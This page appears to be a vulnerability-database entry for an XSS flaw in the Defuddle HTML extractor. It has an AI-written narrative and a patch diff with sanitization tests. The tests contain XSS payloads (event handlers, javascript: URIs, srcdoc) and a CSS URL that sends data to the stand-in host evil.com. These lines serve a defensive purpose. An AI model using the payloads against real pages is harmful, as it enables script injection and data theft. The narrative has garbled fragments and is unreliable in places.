Defuddle: XSS via unescaped string interpolation in _findContentBySchemaText image tag
Description
Defuddle cleans up HTML pages. Prior to version 0.9.0, the _findContentBySchemaText method in src/defuddle.ts interpolates image src and alt attributes directly into an HTML string without escaping. An attacker can use a " in the alt attribute to break out of the attribute context and inject event handler. This issue has been patched in version 0.9.0.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Defuddle is an HTML content extraction library vulnerable to stored XSS via unescaped string interpolation in the `_findContentBySchemaText` method, patched in version 0.9.0.
Vulnerability
Overview
CVE-2026-30830 describes a cross-site scripting (XSS) vulnerability in the Defuddle library, which is used to extract main content from HTML pages. The flaw resides in the _findContentBySchemaText method in src/defuddle.ts. When constructing an HTML string for an image element, the method directly interpolates the src and alt attribute values obtained via getAttribute() without any escaping or sanitization [1][4]. Specifically, the code uses a template literal: html += [4]. This allows an attacker to break out of the alt attribute context by including a double-quote character (") in the alt value, thereby injecting arbitrary HTML attributes, including event handlers like onload or onerror` [2][4].
Exploitation
To exploit this vulnerability, an attacker must craft a malicious HTML page that triggers the schema text fallback path in Defuddle. This requires the schema text word count of the schema text (from a JSON-LD script) to exceed the word count of the extracted content, causing Defuddle to use the schema text as the main content [2][4]. The attacker then includes a sibling image element with a crafted alt attribute containing a quote and an event handler. When Defuddle processes this page, the unescaped interpolation creates an `` tag with the injected event handler, which executes in the context of the page's context when the image is loaded [4]. The attack does not require authentication or special network position, as it can be delivered via any HTML content that Defuddle processes [1][3].
Impact
Successful exploitation allows an attacker to execute arbitrary JavaScript execution in the context of the application using Defuddle. This can lead to theft of sensitive data, session hijacking, or other client-side attacks. The vulnerability is distinct from a previous sanitization bypass (fixed in commit f154cb7) because the injection occurs during string construction, not in the DOM, so _stripUnsafeElements cannot catch it [4]. The CVSS score has not yet been assigned by NVD, but the advisory notes it as a high-severity XSS issue [3][4].
Mitigation
The vulnerability has been patched in Defuddle version 0.9.0 [1][3]. Users should upgrade to this version immediately. There are no known workarounds, workarounds; the fix ensures that attribute values are properly escaped before interpolation [2][4]. The project is actively maintained, and the advisory recommends updating as the primary mitigation [4].
AI Insight generated on May 18, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
defuddlenpm | < 0.9.0 | 0.9.0 |
Affected products
2Patches
1f154cb740ee6Sanitize `this.doc` after `parseInternal` to prevent the `_findContentBySchemaText` fallback from returning unsanitized HTML containing scripts, event handlers, and other dangerous elements. Strips unsafe elements/attributes while preserving legitimate content like math scripts, media iframes, and video embeds. See #139
2 files changed · +135 −92
src/defuddle.ts+23 −17 modified@@ -101,32 +101,38 @@ export class Defuddle { } /** - * Remove dangerous elements from this.doc: scripts, styles, noscript, - * and event-handler attributes. Preserves ld+json and math scripts - * since they've already been consumed by parseInternal. + * Remove dangerous elements and attributes from this.doc. + * Called after parseInternal so that extractors and schema extraction + * can still read script tags they depend on. */ private _stripUnsafeElements(): void { const body = this.doc.body; if (!body) return; - // Remove script tags (ld+json and math already consumed by parseInternal) - const scripts = body.querySelectorAll('script'); - for (const el of scripts) el.remove(); - - // Remove style elements - const styles = body.querySelectorAll('style'); - for (const el of styles) el.remove(); - - // Remove noscript elements - const noscripts = body.querySelectorAll('noscript'); - for (const el of noscripts) el.remove(); - - // Remove event handler attributes (onclick, onerror, onload, etc.) + // Remove dangerous elements. Iframes are kept — same-origin policy + // isolates them, and they're widely used for legitimate media embeds. + // Dangerous iframe attributes (srcdoc, javascript: src) are stripped + // in the attribute pass below. Math scripts are preserved for LaTeX + // content (matching the EXACT_SELECTORS approach). + const dangerousElements = body.querySelectorAll( + 'script:not([type^="math/"]), style, noscript, frame, frameset, object, embed, applet, base' + ); + for (const el of dangerousElements) el.remove(); + + // Remove event handler attributes, dangerous URIs, and srcdoc const allElements = body.querySelectorAll('*'); for (const el of allElements) { for (const attr of Array.from(el.attributes)) { - if (attr.name.toLowerCase().startsWith('on')) { + const name = attr.name.toLowerCase(); + if (name.startsWith('on')) { el.removeAttribute(attr.name); + } else if (name === 'srcdoc') { + el.removeAttribute(attr.name); + } else if (['href', 'src', 'action', 'formaction', 'xlink:href'].includes(name)) { + const val = attr.value.replace(/[\s\u0000-\u001F]+/g, '').toLowerCase(); + if (val.startsWith('javascript:') || val.startsWith('data:text/html')) { + el.removeAttribute(attr.name); + } } } }
tests/schema-fallback.test.ts+112 −75 modified@@ -225,107 +225,144 @@ describe('Schema.org text fallback', () => { }); }); +/** + * Security tests for the schema.org text fallback path. + * + * To trigger the fallback, the schema text word count must exceed the + * extracted content word count. We achieve this by putting a short + * <article> (which the scorer favors) alongside a longer <div> that + * contains the schema text plus dangerous elements. + */ describe('Schema.org text fallback sanitization', () => { - test('strips script tags from schema fallback content', () => { - const postText = 'This is a social media post with enough words to trigger the schema text fallback path. We need the word count to exceed what the content scorer extracts from the page so the fallback kicks in and searches the DOM.'; + // Helper: build HTML where the schema fallback triggers and the + // matched DOM element contains the given dangerous HTML. + function buildSchemaFallbackHtml(dangerousHtml: string): string { + const schemaText = 'This is the full post body with enough words to exceed the short article summary that the content scorer will extract. Adding more sentences here to make sure the word count difference is large enough to reliably trigger the schema text fallback path in the parse method.'; - const html = ` + return ` <!DOCTYPE html> <html> <head> <title>Test</title> <script type="application/ld+json"> { "@type": "SocialMediaPosting", - "text": "${postText}" + "text": "${schemaText}" } </script> </head> <body> - <div class="post"> - <p>${postText}</p> - <script>alert('xss')</script> + <article> + <h1>Title</h1> + <p>Short article summary.</p> + </article> + <div class="full-post"> + <p>${schemaText}</p> + ${dangerousHtml} </div> </body> </html>`; + } + test('strips script tags from schema fallback content', () => { + const html = buildSchemaFallbackHtml('<script>alert("xss")</script>'); const doc = createDocument(html); - const defuddle = new Defuddle(doc); - const result = defuddle.parse(); + const result = new Defuddle(doc).parse(); - expect(result.content).toContain('social media post'); + expect(result.content).toContain('full post body'); expect(result.content).not.toContain('<script'); expect(result.content).not.toContain('alert'); }); test('strips event handlers from schema fallback content', () => { - const postText = 'This post contains an image with a malicious event handler that should be stripped during the schema text fallback. Adding more words here to ensure we exceed the extracted content word count threshold.'; - - const html = ` - <!DOCTYPE html> - <html> - <head> - <title>Test</title> - <script type="application/ld+json"> - { - "@type": "SocialMediaPosting", - "text": "${postText}" - } - </script> - </head> - <body> - <div class="post"> - <p>${postText}</p> - <img src="x.jpg" onerror="alert('xss')" onclick="steal()"> - </div> - </body> - </html>`; - + const html = buildSchemaFallbackHtml('<img src="x.jpg" onerror="alert(\'xss\')" onclick="steal()">'); const doc = createDocument(html); - const defuddle = new Defuddle(doc); - const result = defuddle.parse(); + const result = new Defuddle(doc).parse(); - expect(result.content).toContain('malicious event handler'); + expect(result.content).toContain('full post body'); expect(result.content).not.toContain('onerror'); expect(result.content).not.toContain('onclick'); expect(result.content).not.toContain('alert'); expect(result.content).not.toContain('steal'); }); test('strips style elements from schema fallback content', () => { - const postText = 'This post has an embedded style element that could be used for CSS-based attacks or data exfiltration. We need enough words here to trigger the schema text fallback mechanism.'; - - const html = ` - <!DOCTYPE html> - <html> - <head> - <title>Test</title> - <script type="application/ld+json"> - { - "@type": "SocialMediaPosting", - "text": "${postText}" - } - </script> - </head> - <body> - <div class="post"> - <style>.secret { background: url('https://evil.com/steal?data=123') }</style> - <p>${postText}</p> - </div> - </body> - </html>`; - + const html = buildSchemaFallbackHtml('<style>.x { background: url("https://evil.com/steal") }</style>'); const doc = createDocument(html); - const defuddle = new Defuddle(doc); - const result = defuddle.parse(); + const result = new Defuddle(doc).parse(); - expect(result.content).toContain('embedded style element'); + expect(result.content).toContain('full post body'); expect(result.content).not.toContain('<style'); expect(result.content).not.toContain('evil.com'); }); test('strips noscript elements from schema fallback content', () => { - const postText = 'This post contains a noscript element with potentially dangerous content that should be removed during sanitization. More words to trigger the fallback path reliably.'; + const html = buildSchemaFallbackHtml('<noscript><img src="https://evil.com/track"></noscript>'); + const doc = createDocument(html); + const result = new Defuddle(doc).parse(); + + expect(result.content).toContain('full post body'); + expect(result.content).not.toContain('<noscript'); + expect(result.content).not.toContain('evil.com'); + }); + + test('preserves iframes in schema fallback content', () => { + const html = buildSchemaFallbackHtml( + '<iframe src="https://www.youtube.com/embed/abc123" width="560" height="315"></iframe>' + + '<iframe src="https://open.spotify.com/embed/track/xyz"></iframe>' + ); + const doc = createDocument(html); + const result = new Defuddle(doc).parse(); + + expect(result.content).toContain('full post body'); + expect(result.content).toContain('youtube.com/embed/abc123'); + expect(result.content).toContain('spotify.com/embed/track/xyz'); + }); + + test('strips srcdoc attribute from iframes in schema fallback content', () => { + const html = buildSchemaFallbackHtml( + '<iframe srcdoc="<script>alert(\'xss\')</script>"></iframe>' + ); + const doc = createDocument(html); + const result = new Defuddle(doc).parse(); + + expect(result.content).toContain('full post body'); + expect(result.content).not.toContain('srcdoc'); + expect(result.content).not.toContain('alert'); + }); + + test('strips object and embed elements from schema fallback content', () => { + const html = buildSchemaFallbackHtml('<object data="https://evil.com/flash.swf"></object><embed src="https://evil.com/plugin">'); + const doc = createDocument(html); + const result = new Defuddle(doc).parse(); + + expect(result.content).toContain('full post body'); + expect(result.content).not.toContain('<object'); + expect(result.content).not.toContain('<embed'); + expect(result.content).not.toContain('evil.com'); + }); + + test('strips javascript: URIs from schema fallback content', () => { + const html = buildSchemaFallbackHtml('<a href="javascript:alert(\'xss\')">click me</a><a href=" javascript:void(0)">spaced</a>'); + const doc = createDocument(html); + const result = new Defuddle(doc).parse(); + + expect(result.content).toContain('full post body'); + expect(result.content).not.toContain('javascript:'); + }); + + test('strips data:text/html URIs from schema fallback content', () => { + const html = buildSchemaFallbackHtml('<img src="data:text/html,<script>alert(1)</script>">'); + const doc = createDocument(html); + const result = new Defuddle(doc).parse(); + + expect(result.content).toContain('full post body'); + expect(result.content).not.toContain('data:text/html'); + }); + + test('strips base tag to prevent URL hijacking', () => { + // base tag goes before the article, not inside the dangerous html helper + const schemaText = 'This is the full post body with enough words to exceed the short article summary that the content scorer will extract. Adding more sentences here to make sure the word count difference is large enough to reliably trigger the schema text fallback path in the parse method.'; const html = ` <!DOCTYPE html> @@ -335,29 +372,31 @@ describe('Schema.org text fallback sanitization', () => { <script type="application/ld+json"> { "@type": "SocialMediaPosting", - "text": "${postText}" + "text": "${schemaText}" } </script> </head> <body> - <div class="post"> - <p>${postText}</p> - <noscript><img src="https://evil.com/track"></noscript> + <base href="https://evil.com/"> + <article> + <h1>Title</h1> + <p>Short article summary.</p> + </article> + <div class="full-post"> + <p>${schemaText}</p> </div> </body> </html>`; const doc = createDocument(html); - const defuddle = new Defuddle(doc); - const result = defuddle.parse(); + const result = new Defuddle(doc).parse(); - expect(result.content).toContain('noscript element'); - expect(result.content).not.toContain('<noscript'); - expect(result.content).not.toContain('evil.com'); + expect(result.content).toContain('full post body'); + expect(result.content).not.toContain('<base'); }); test('schema text string fallback does not contain HTML injection', () => { - // Schema text that contains HTML but no DOM match exists + // Schema text that does NOT appear in the DOM → raw text fallback const html = ` <!DOCTYPE html> <html> @@ -376,11 +415,9 @@ describe('Schema.org text fallback sanitization', () => { </html>`; const doc = createDocument(html); - const defuddle = new Defuddle(doc); - const result = defuddle.parse(); + const result = new Defuddle(doc).parse(); - // The raw schema text is used as content — verify it doesn't execute - // (schema text is plain text, not DOM HTML, so script tags are literal text) + // Raw schema text is used as content (plain text, not DOM HTML) expect(result.content).toContain('Safe text'); }); });
Vulnerability mechanics
Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
4- github.com/advisories/GHSA-5mq8-78gm-pjmqghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2026-30830ghsaADVISORY
- github.com/kepano/defuddle/commit/f154cb740ee603431b69638273af737a27156df9ghsax_refsource_MISCWEB
- github.com/kepano/defuddle/security/advisories/GHSA-5mq8-78gm-pjmqghsax_refsource_CONFIRMWEB
News mentions
0No linked articles in our index yet.